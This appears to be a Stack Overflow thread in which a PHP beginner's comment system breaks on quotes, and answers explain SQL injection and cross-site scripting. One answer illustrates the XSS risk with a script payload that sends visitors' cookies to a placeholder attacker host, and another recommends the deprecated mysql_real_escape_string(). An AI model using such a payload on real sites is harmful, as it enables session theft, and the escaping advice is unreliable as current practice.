# how to stop people from breaking your comment system by writing quotes

Tags: php, special-characters

im making a comment system in my website. However, the commentor can break the system by typing special characters such as quotes, double quotes, semi-colons,colons etc. This is not a duplicate, i want to make sure that htmlentities are converted before it get to the database, i could use str_replace but it actually prints the literal code. for example:
    "

like this example:

```
$str ="Hi there bro what's up, im a "MEGA"";
$comment = $str;
echo $comment;
```

however it spits out errors, because they break the query because of the quotation marks.

Comment: Escape quotes before inserting into a database; or better yet, use prepared statements and bind variables, which do it for you

Comment: Users doesn't know how to do that. What statements could fix them?

Comment: Clean data before inserting into your database.

Comment: remove double quotes before insert data to database.

Comment: How? Can u provide an answer, ill upvote if it helps. And mark it as answered if it worked.

Comment: totally not a duplicate, its actually different.

Comment: all the answers on that post are exactly what you should be doing.

Comment: read it, but it was not the answer ive been looking for, so stop saying its a duplicate.

Comment: Please edit your question to include the code which is breaking and producing errors.

Comment: @Kenster Duplicate of SQL injection?

Answer (score 3):

What you have on your site is called Cross-site scripting vulnerability. Any user can inject code like:

```
Nice site what you have!<script>document.location="http://some_attacker/cookie.cgi?" + document.cookie</script>
```

What you will see is just `Nice site what you have!` as a comment, but the attacker can now take over your session.

You have to use `htmlspecialchars()` function when outputting user supplied data. You better read more about it.

Answer (score -1):

If you're using MySQL and php mysql you have to pass data through the mysql_real_escape_string() function.

For example, before inserting into database:

```
$comment = mysql_real_escape_string($_POST['comment']);
```

Then, for printing your HTML:

```
<p><?=htmlspecialchars($Rs['comment'])?></p>
```

[mysql_real_escape_string()](http://php.net/manual/es/function.mysql-real-escape-string.php)

[htmlspecialchars()](http://php.net/manual/es/function.htmlspecialchars.php)

Comment: `mysql_` functions are deprecated.. you should never suggest using it!

Comment: mysqli is hard to understand, so thanks btw.

Comment: If you're using mysqli, then see the equivalent in mysqli [mysqli::real_escape_string](http://php.net/manual/es/mysqli.real-escape-string.php)

Comment: are you serious? :)) how can it be hard to understand if it is providing the same methods as `mysql_`.. you can use the OOP version only if you want so..

Comment: I'm assuming he doesn't know prepared statements

Comment: They are totally different for me to understand. I tried to learn it, never got into my nerves.

Comment: @Bido262 Well you had better try again. PHP7 does not include the `mysql_` extensions any more